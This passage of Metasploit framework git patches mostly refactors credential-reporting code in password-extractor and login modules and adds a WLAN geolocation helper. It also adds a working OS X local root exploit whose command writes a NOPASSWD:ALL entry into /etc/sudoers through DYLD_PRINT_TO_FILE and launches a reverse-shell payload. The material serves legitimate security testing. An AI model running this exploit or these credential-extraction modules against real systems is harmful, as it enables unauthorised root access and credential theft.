+      service_name: 'smb',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id,
+      proof: res
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: username
+    }
+
+    credential_data.merge!(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }
+
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
+
   def run_host(ip)
 
     [[139, false], [445, true]].each do |info|
@@ -115,22 +143,22 @@ class Metasploit3 < Msf::Auxiliary
       begin
         dcerpc_bind(handle)
         stub =
-          NDR.uwstring("\\\\" + ip) +	# Server Name
-          NDR.long(1) +						# Level
-          NDR.long(1) +						# Ctr
-          NDR.long(rand(0xffffffff)) +	# ref id
-          NDR.long(0) +						# entries read
-          NDR.long(0) +						# null ptr to user0
+          NDR.uwstring("\\\\" + ip) + # Server Name
+          NDR.long(1) +           # Level
+          NDR.long(1) +           # Ctr
+          NDR.long(rand(0xffffffff)) +  # ref id
+          NDR.long(0) +           # entries read
+          NDR.long(0) +           # null ptr to user0
 
-          NDR.long(0xffffffff) +			# Prefmaxlen
-          NDR.long(rand(0xffffffff)) +	# ref id
-          NDR.long(0)							# null ptr to resume handle
+          NDR.long(0xffffffff) +      # Prefmaxlen
+          NDR.long(rand(0xffffffff)) +  # ref id
+          NDR.long(0)             # null ptr to resume handle
 
         dcerpc.call(2,stub)
 
         resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil
 
-        accounts = parse_NetWkstaEnumUsersInfo(resp)
+        accounts = parse_net_wksta_enum_users_info(resp)
         accounts.shift
 
         if datastore['VERBOSE']
@@ -154,16 +182,7 @@ class Metasploit3 < Msf::Auxiliary
           end
 
           print_good("#{ip} - Found user: #{comp_user}")
-          credential_core =  create_credential(
-            origin_type: :service,
-            address: ip,
-            port: rport,
-            service_name: 'smb',
-            protocol: 'tcp',
-            module_fullname: self.fullname,
-            workspace_id: myworkspace.id,
-            username: comp_user
-          )
+          store_username(comp_user, resp, ip, rport)
         end
 
       rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e

From 85e806dc9934d8b6fe7f3da175d2e5ec0c26a2ba Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Mon, 20 Jul 2015 19:28:19 -0500
Subject: [PATCH 0842/1013] Add simple class for getting geo data from Google

---
 lib/rex/google_geolocation.rb | 83 +++++++++++++++++++++++++++++++++++
 1 file changed, 83 insertions(+)
 create mode 100755 lib/rex/google_geolocation.rb

diff --git a/lib/rex/google_geolocation.rb b/lib/rex/google_geolocation.rb
new file mode 100755
index 0000000000..a7551cb944
--- /dev/null
+++ b/lib/rex/google_geolocation.rb
@@ -0,0 +1,83 @@
+#!/usr/bin/env ruby
+
+require 'net/http'
+require 'json'
+
+module Rex
+  # @example
+  #   g = GoogleGeolocation.new
+  #   g.add_wlan("00:11:22:33:44:55", "example", -80)
+  #   g.fetch!
+  #   puts g, g.google_maps_url
+  class GoogleGeolocation
+
+    GOOGLE_API_URI = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true&"
+
+    attr_accessor :accuracy
+    attr_accessor :latitude
+    attr_accessor :longitude
+
+    def initialize
+      @uri = URI.parse(GOOGLE_API_URI)
+      @wlan_list = []
+    end
+
+    # Ask Google's Maps API for the location of a given set of BSSIDs (MAC
+    # addresses of access points), ESSIDs (AP names), and signal strengths.
+    def fetch!
+      @uri.query << @wlan_list.join("&")
+
+      request = Net::HTTP::Get.new(@uri.request_uri)
+      http = Net::HTTP::new(@uri.host,@uri.port)
+      http.use_ssl = true
+      response = http.request(request)
+
+      if response && response.code == '200'
+        results = JSON.parse(response.body)
+        self.latitude = results["location"]["lat"]
+        self.longitude = results["location"]["lng"]
+        self.accuracy = results["accuracy"]
+      else
+        raise "Failure connecting to Google for location lookup."
+      end
+    end
+
+    # Add an AP to the list to send to Google when {#fetch!} is called.
+    #
+    # Turns out Google's API doesn't really care about ESSID or signal strength
+    # as long as you have BSSIDs. Presumably adding them will make it more
+    # accurate? Who knows.
+    #
+    # @param mac [String] in the form "00:11:22:33:44:55"
+    # @param ssid [String] ESSID associated with the mac
+    # @param signal_strength [String] a thing like
+    def add_wlan(mac, ssid = nil, signal_strength = nil)
+      @wlan_list.push("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}")
+    end
+
+    def google_maps_url
+      "https://maps.google.com/?q=#{latitude},#{longitude}"
+    end
+
+    def to_s
+      "Google indicates the device is within #{accuracy} meters of #{latitude},#{longitude}."
+    end
+
+  end
+end
+
+if $0 == __FILE__
+  if ARGV.empty?
+    $stderr.puts("Usage: #{$0} <mac> [mac] ...")
+    $stderr.puts("Ask Google for the location of the given set of BSSIDs")
+    $stderr.puts
+    $stderr.puts("Example: iwlist sc 2>/dev/null|awk '/Address/{print $5}'|xargs #{$0}")
+    exit(1)
+  end
+  g = Rex::GoogleGeolocation.new
+  ARGV.each do |mac|
+    g.add_wlan(mac, nil, -83)
+  end
+  g.fetch!
+  puts g, g.google_maps_url
+end

From d6e12d431f4b9a712bbff754e8d344e832c3ca9c Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Mon, 20 Jul 2015 19:40:25 -0500
Subject: [PATCH 0843/1013] Style and whitespace

---
 modules/post/multi/gather/wlan_geolocate.rb | 46 ++++++++++-----------
 1 file changed, 23 insertions(+), 23 deletions(-)

diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb
index a2e18e5018..ecb302a952 100644
--- a/modules/post/multi/gather/wlan_geolocate.rb
+++ b/modules/post/multi/gather/wlan_geolocate.rb
@@ -43,14 +43,14 @@ class Metasploit3 < Msf::Post
     wlan_list = ''
     raw_networks = listing.split("\r\n\r\n")
 
-    raw_networks.each { |network|
+    raw_networks.each do |network|
       details = network.match(/^SSID [\d]+ : ([^\r\n]*).*?BSSID 1[\s]+: ([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}).*?Signal[\s]+: ([\d]{1,3})%/m)
-        if !details.nil?
-          strength = get_strength(details[3])
-          network_data = "&wifi=mac:#{details[2].to_s.upcase}|ssid:#{details[1].to_s}|ss=#{strength.to_i}"
-          wlan_list << network_data
-        end
-    }
+      if !details.nil?
+        strength = get_strength(details[3])
+        network_data = "&wifi=mac:#{details[2].to_s.upcase}|ssid:#{details[1].to_s}|ss=#{strength.to_i}"
+        wlan_list << network_data
+      end
+    end
 
     return wlan_list
   end
@@ -60,13 +60,13 @@ class Metasploit3 < Msf::Post
     wlan_list = ''
     raw_networks = listing.split("Cell ")
 
-    raw_networks.each { |network|
+    raw_networks.each do |network|
       details = network.match(/^[\d]{1,4} - Address: ([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}).*?Signal level=([\d-]{1,3}).*?ESSID:"([^"]*)/m)
-        if !details.nil?
-          network_data = "&wifi=mac:#{details[1].to_s.upcase}|ssid:#{details[3].to_s}|ss=#{details[2].to_i}"
-          wlan_list << network_data
-        end
-    }
+      if !details.nil?
+        network_data = "&wifi=mac:#{details[1].to_s.upcase}|ssid:#{details[3].to_s}|ss=#{details[2].to_i}"
+        wlan_list << network_data
+      end
+    end
 
     return wlan_list
   end
@@ -75,14 +75,14 @@ class Metasploit3 < Msf::Post
     wlan_list = ''
     raw_networks = listing.split("\n")
 
-    raw_networks.each { |network|
+    raw_networks.each do |network|
       network = network.strip
       details = network.match(/^(.*(?!\h\h:))[\s]*([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2})[\s]*([\d-]{1,3})/)
-        if !details.nil?
-          network_data = "&wifi=mac:#{details[2].to_s.upcase}|ssid:#{details[1].to_s}|ss=#{details[3].to_i}"
-          wlan_list << network_data
-        end
-    }
+      if !details.nil?
+        network_data = "&wifi=mac:#{details[2].to_s.upcase}|ssid:#{details[1].to_s}|ss=#{details[3].to_i}"
+        wlan_list << network_data
+      end
+    end
 
     return wlan_list
   end
@@ -214,10 +214,10 @@ class Metasploit3 < Msf::Post
       return nil
     end
 
-    rescue Rex::TimeoutError, Rex::Post::Meterpreter::RequestError
-    rescue ::Exception => e
-      print_status("The following Error was encountered: #{e.class} #{e}")
-    end
+  rescue Rex::TimeoutError, Rex::Post::Meterpreter::RequestError
+  rescue ::Exception => e
+    print_status("The following Error was encountered: #{e.class} #{e}")
+  end
 
 
 end

From 52e4f45ecdc9fd723587456b6cc80f978617aece Mon Sep 17 00:00:00 2001
From: James Lee <egypt@metasploit.com>
Date: Mon, 20 Jul 2015 20:24:07 -0500
Subject: [PATCH 0844/1013] Use the new thing in wlan_geolocate

---
 modules/post/multi/gather/wlan_geolocate.rb | 44 ++++++++-------------
 1 file changed, 17 insertions(+), 27 deletions(-)

diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb
index ecb302a952..1c9d7d2f84 100644
--- a/modules/post/multi/gather/wlan_geolocate.rb
+++ b/modules/post/multi/gather/wlan_geolocate.rb
@@ -5,8 +5,7 @@
 
 require 'msf/core'
 require 'rex'
-require 'json'
-require 'net/http'
+require 'rex/google_geolocation'
 
 class Metasploit3 < Msf::Post
 
@@ -40,15 +39,14 @@ class Metasploit3 < Msf::Post
   end
 
   def parse_wireless_win(listing)
-    wlan_list = ''
+    wlan_list = []
     raw_networks = listing.split("\r\n\r\n")
 
     raw_networks.each do |network|
       details = network.match(/^SSID [\d]+ : ([^\r\n]*).*?BSSID 1[\s]+: ([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}).*?Signal[\s]+: ([\d]{1,3})%/m)
       if !details.nil?
         strength = get_strength(details[3])
-        network_data = "&wifi=mac:#{details[2].to_s.upcase}|ssid:#{details[1].to_s}|ss=#{strength.to_i}"
-        wlan_list << network_data
+        wlan_list << [ details[2], details[1], strength ]
       end
     end
 
@@ -57,14 +55,13 @@ class Metasploit3 < Msf::Post
 
 
   def parse_wireless_linux(listing)
-    wlan_list = ''
+    wlan_list = []
     raw_networks = listing.split("Cell ")
 
     raw_networks.each do |network|
       details = network.match(/^[\d]{1,4} - Address: ([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}).*?Signal level=([\d-]{1,3}).*?ESSID:"([^"]*)/m)
       if !details.nil?
-        network_data = "&wifi=mac:#{details[1].to_s.upcase}|ssid:#{details[3].to_s}|ss=#{details[2].to_i}"
-        wlan_list << network_data
+        wlan_list << [ details[1], details[3], details[2] ]
       end
     end
 
@@ -72,15 +69,14 @@ class Metasploit3 < Msf::Post
   end
 
   def parse_wireless_osx(listing)
-    wlan_list = ''
+    wlan_list = []
     raw_networks = listing.split("\n")
 
     raw_networks.each do |network|
       network = network.strip
       details = network.match(/^(.*(?!\h\h:))[\s]*([\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2}:[\h]{2})[\s]*([\d-]{1,3})/)
       if !details.nil?
-        network_data = "&wifi=mac:#{details[2].to_s.upcase}|ssid:#{details[1].to_s}|ss=#{details[3].to_i}"
-        wlan_list << network_data
+        wlan_list << [ details[2], details[1], details[3] ]
       end
     end
 
@@ -93,25 +89,19 @@ class Metasploit3 < Msf::Post
       print_error("Unable to enumerate wireless networks from the target.  Wireless may not be present or enabled.")
       return
     end
+    g = Rex::GoogleGeolocation.new
 
-    # Build and send the request to Google
-    url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
-    uri = URI.parse(URI.encode(url))
-    request = Net::HTTP::Get.new(uri.request_uri)
-    http = Net::HTTP::new(uri.host,uri.port)
-    http.use_ssl = true
-    response = http.request(request)
+    wlan_list.each do |wlan|
+      g.add_wlan(*wlan)
+    end
 
-    # Gather the required information from the response
-    if response && response.code == '200'
-      results = JSON.parse(response.body)
-      latitude =  results["location"]["lat"]
-      longitude = results["location"]["lng"]
-      accuracy = results["accuracy"]
-      print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.")
-      print_status("Google Maps URL:  https://maps.google.com/?q=#{latitude},#{longitude}")
+    begin
+      g.fetch!
+    rescue RuntimeError => e
+      print_error("Error: #{e}")
     else
-      print_error("Failure connecting to Google for location lookup.")
+      print_status(g.to_s)
+      print_status("Google Maps URL:  #{g.google_maps_url}")
     end
 
   end

From 3013ab472440f77df971884e48c6d13ea4fac81c Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Tue, 21 Jul 2015 21:43:51 -0500
Subject: [PATCH 0845/1013] Add osx root privilege escalation.

---
 .../osx/local/dlyd_print_to_file_root.rb      | 86 +++++++++++++++++++
 1 file changed, 86 insertions(+)
 create mode 100644 modules/exploits/osx/local/dlyd_print_to_file_root.rb

diff --git a/modules/exploits/osx/local/dlyd_print_to_file_root.rb b/modules/exploits/osx/local/dlyd_print_to_file_root.rb
new file mode 100644
index 0000000000..8a68275e8f
--- /dev/null
+++ b/modules/exploits/osx/local/dlyd_print_to_file_root.rb
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+
+  Rank = GreatRanking
+
+  include Msf::Post::OSX::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apple OS X DYLD_PRINT_TO_FILE Privilege Escalation',
+      'Description'    => %q{
+        In Mac OS X 10.10.x, the DYLD_PRINT_TO_FILE environment variable is still
+        supported for suid binaries. This allows an arbitrary file write as root.
+      },
+      'Author'         => [
+        'Stefan Esser', # Vulnerability discovery and PoC
+        'joev'          # Copy/paste monkey
+      ],
+      'References'     => [
+        ['URL',   'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html']
+      ],
+      'DisclosureDate' => 'Jul 21 2015',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'osx',
+      'Arch'           => ARCH_X86_64,
+      'SessionTypes'   => ['shell'],
+      'Privileged'     => true,
+      'Targets'        => [
+        ['Mac OS X 10.10-10.10.4', {}]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'PAYLOAD'         => 'osx/x64/shell_reverse_tcp'
+      }
+    ))
+
+    register_options([
+      OptString.new('PYTHON',      [true, 'Python executable', '/usr/bin/python']),
+      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
+    ])
+  end
+
+  def exploit
+    print_status("Writing payload to `#{payload_file}'")
+    write_file(payload_file, binary_payload)
+    register_file_for_cleanup(payload_file)
+    cmd_exec("chmod +x #{payload_file}")
+
+    print_status("Executing exploit at #{payload_file}...")
+    cmd_exec(sploit)
+  end
+
+  def check
+    (ver?) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe
+  end
+
+  def ver?
+    Gem::Version.new(get_sysinfo['ProductVersion']).between?(
+      Gem::Version.new('10.10.0'), Gem::Version.new('10.10.4')
+    )
+  end
+
+  def sploit
+    %Q|#{datastore['PYTHON']} -c \\'"import os;os.write(3,\\"ALL ALL=|+
+      %Q|(ALL) NOPASSWD: ALL\\")"\\'\|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;|+
+      %Q|/bin/sh -c 'sudo #{payload_file} &'|
+  end
+
+  def binary_payload
+    Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+  end
+
+  def payload_file
+    @payload_file ||=
+      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
+  end
+
+end

From 165cb195bf8a46878eb1dad324803b65c24cc238 Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Tue, 21 Jul 2015 22:47:52 -0500
Subject: [PATCH 0846/1013] Remove python dependency, add credit URL.

---
 modules/exploits/osx/local/dlyd_print_to_file_root.rb | 8 +++-----
 1 file changed, 3 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/osx/local/dlyd_print_to_file_root.rb b/modules/exploits/osx/local/dlyd_print_to_file_root.rb
index 8a68275e8f..6441915fe0 100644
--- a/modules/exploits/osx/local/dlyd_print_to_file_root.rb
+++ b/modules/exploits/osx/local/dlyd_print_to_file_root.rb
@@ -25,7 +25,8 @@ class Metasploit4 < Msf::Exploit::Local
         'joev'          # Copy/paste monkey
       ],
       'References'     => [
-        ['URL',   'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html']
+        ['URL', 'https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html'],
+        ['URL', 'https://www.reddit.com/r/netsec/comments/3e34i2/os_x_1010_dyld_print_to_file_local_privilege/']
       ],
       'DisclosureDate' => 'Jul 21 2015',
       'License'        => MSF_LICENSE,
@@ -43,7 +44,6 @@ class Metasploit4 < Msf::Exploit::Local
     ))
 
     register_options([
-      OptString.new('PYTHON',      [true, 'Python executable', '/usr/bin/python']),
       OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
     ])
   end
@@ -69,9 +69,7 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def sploit
-    %Q|#{datastore['PYTHON']} -c \\'"import os;os.write(3,\\"ALL ALL=|+
-      %Q|(ALL) NOPASSWD: ALL\\")"\\'\|DYLD_PRINT_TO_FILE=/etc/sudoers newgrp;|+
-      %Q|/bin/sh -c 'sudo #{payload_file} &'|
+    "/bin/sh -c \"echo 'echo \\\"$(whoami) ALL=(ALL) NOPASSWD:ALL\\\" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo #{payload_file} &\""
   end
 
   def binary_payload

From 4561850055007c208e124cdf05633cdcc70ac226 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 22 Jul 2015 01:11:43 -0500
Subject: [PATCH 0847/1013] Use metasploit-credential API instead of
 report_auth_info

---
 .../admin/hp/hp_imc_som_create_account.rb     |  44 ++-
 .../http/dlink_dir_645_password_extractor.rb  |  45 ++-
 .../http/dlink_dsl320b_password_extractor.rb  |  41 ++-
 .../admin/http/nexpose_xxe_file_read.rb       |  41 ++-
 .../admin/http/vbulletin_upgrade_admin.rb     |  42 ++-
 .../admin/http/wp_custom_contact_forms.rb     |  39 ++-
 .../http/zyxel_admin_password_extractor.rb    |  43 ++-
 .../admin/misc/sercomm_dump_config.rb         |  44 ++-
 .../auxiliary/admin/oracle/oracle_login.rb    |  39 ++-
 .../scanner/http/drupal_views_user_enum.rb    |   1 -
 .../scanner/nexpose/nexpose_api_login.rb      |  45 ++-
 .../scanner/openvas/openvas_gsad_login.rb     |  44 ++-
 .../scanner/openvas/openvas_omp_login.rb      |  42 ++-
 .../scanner/openvas/openvas_otp_login.rb      |  42 ++-
 modules/auxiliary/scanner/scada/koyo_login.rb |  40 ++-
 modules/auxiliary/server/capture/drda.rb      |  41 ++-
 modules/auxiliary/server/capture/ftp.rb       |  41 ++-
 .../auxiliary/server/capture/http_basic.rb    |  41 ++-
 modules/auxiliary/server/capture/pop3.rb      |  41 ++-
 .../auxiliary/server/capture/postgresql.rb    |  43 ++-
 modules/auxiliary/server/capture/sip.rb       |  43 ++-
 modules/auxiliary/server/capture/smtp.rb      |  41 ++-
 modules/auxiliary/server/capture/vnc.rb       |  43 ++-
 .../auxiliary/test/report_auth_info.rb        | 265 +++++++++++++++++-
 24 files changed, 1005 insertions(+), 186 deletions(-)

diff --git a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb
index 4f5d3de838..1941291594 100644
--- a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb
+++ b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb
@@ -71,6 +71,32 @@ class Metasploit3 < Msf::Auxiliary
     return nil
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run
 
     print_status("#{peer} - Trying to find the service desk service strong name...")
@@ -232,15 +258,15 @@ class Metasploit3 < Msf::Auxiliary
       login_url = ssl ? "https://" : "http://"
       login_url << "#{rhost}:#{rport}/servicedesk/ServiceDesk.jsp"
 
-      report_auth_info({
-        :host => rhost,
-        :port => rport,
-        :user => datastore["USERNAME"],
-        :pass => datastore["PASSWORD"],
-        :type => "password",
-        :sname => (ssl ? "https" : "http"),
-        :proof => "#{login_url}\n#{res.body}"
-      })
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: (ssl ? "https" : "http"),
+        user: datastore['USERNAME'],
+        password: datastore['PASSWORD'],
+        proof: "#{login_url}\n#{res.body}"
+      )
+
       print_good("#{peer} - Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.")
       print_status("#{peer} - Use it to log into #{login_url}")
     end
diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
index cb95df48c3..533a7d5074 100644
--- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
+++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb
@@ -33,6 +33,35 @@ class Metasploit3 < Msf::Auxiliary
     )
   end
 
+
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+
   def run
 
     vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device")
@@ -72,14 +101,14 @@ class Metasploit3 < Msf::Auxiliary
             vprint_good("user: #{@user}")
             vprint_good("pass: #{pass}")
 
-          report_auth_info(
-            :host => rhost,
-            :port => rport,
-            :sname => 'http',
-            :user => @user,
-            :pass => pass,
-            :active => true
-          )
+            report_cred(
+              ip: rhost,
+              port: rport,
+              service_name: 'http',
+              user: @user,
+              password: pass,
+              proof: line
+            )
           end
         end
       end
diff --git a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
index dad5e64ed6..9ab873d031 100644
--- a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
+++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
@@ -32,6 +32,33 @@ class Metasploit3 < Msf::Auxiliary
     )
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run
     vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device")
 
@@ -69,13 +96,13 @@ class Metasploit3 < Msf::Auxiliary
             pass = $1
             pass = Rex::Text.decode_base64(pass)
             print_good("#{rhost}:#{rport} - Credentials found: #{user} / #{pass}")
-            report_auth_info(
-              :host => rhost,
-              :port => rport,
-              :sname => 'http',
-              :user => user,
-              :pass => pass,
-              :active => true
+            report_cred(
+              ip: rhost,
+              port: rport,
+              sname: 'http',
+              user: user,
+              password: pass,
+              proof: line
             )
           end
         end
diff --git a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
index c55a974bc0..5087e8bcb4 100644
--- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
+++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
@@ -47,6 +47,32 @@ class Metasploit4 < Msf::Auxiliary
     ], self.class)
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run
     user = datastore['USERNAME']
     pass = datastore['PASSWORD']
@@ -57,14 +83,13 @@ class Metasploit4 < Msf::Auxiliary
     print_status("Authenticating as: " << user)
     begin
       nsc.login
-      report_auth_info(
-        :host   => rhost,
-        :port   => rport,
-        :sname  => prot,
-        :user   => user,
-        :pass   => pass,
-        :proof  => '',
-        :active => true
+
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: prot,
+        user: user,
+        password: pass
       )
 
     rescue
diff --git a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb
index 638d429021..b9efc4ae7f 100644
--- a/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb
+++ b/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb
@@ -49,6 +49,33 @@ class Metasploit3 < Msf::Auxiliary
     datastore["PASSWORD"]
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
+
   def run
 
     if user == pass
@@ -84,14 +111,13 @@ class Metasploit3 < Msf::Auxiliary
 
     if res and res.code == 200 and res.body =~ /Administrator account created/
       print_good("#{peer} - Admin account with credentials #{user}:#{pass} successfully created")
-      report_auth_info(
-        :host => rhost,
-        :port => rport,
-        :sname => 'http',
-        :user => user,
-        :pass => pass,
-        :active => true,
-        :proof  => res.body
+      report_cred(
+        ip: rhost,
+        port: rport,
+        service_name: 'http',
+        user: user,
+        password: pass,
+        proof: res.body
       )
     else
       print_error("#{peer} - Admin account creation failed")
diff --git a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb
index 75bf278687..774e6f0f3e 100644
--- a/modules/auxiliary/admin/http/wp_custom_contact_forms.rb
+++ b/modules/auxiliary/admin/http/wp_custom_contact_forms.rb
@@ -62,6 +62,33 @@ class Metasploit3 < Msf::Auxiliary
     table_prefix
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      last_attempted_at: DateTime.now,
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::SUCCESSFUL,
+      proof: opts[:proof]
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def run
     username = Rex::Text.rand_text_alpha(10)
     password = Rex::Text.rand_text_alpha(20)
@@ -98,14 +125,14 @@ class Metasploit3 < Msf::Auxiliary
     # login successfull
     if cookie
       print_status("#{peer} - User #{username} with password #{password} successfully created")
-      report_auth_info(
-        sname: 'WordPress',
-        host: rhost,
+      report_cred(
+        ip: rhost,
         port: rport,
         user: username,
-        pass: password,
-        active: true
-    )
+        password: password,
+        service_name: 'WordPress',
+        proof: cookie
+      )
     else
       print_error("#{peer} - User creation failed")
       return
diff --git a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
index 44f67456a9..ec3ce10323 100644
--- a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
+++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb
@@ -7,8 +7,8 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
 
-  include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
 
   def initialize
     super(
@@ -33,6 +33,32 @@ class Metasploit3 < Msf::Auxiliary
     )
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
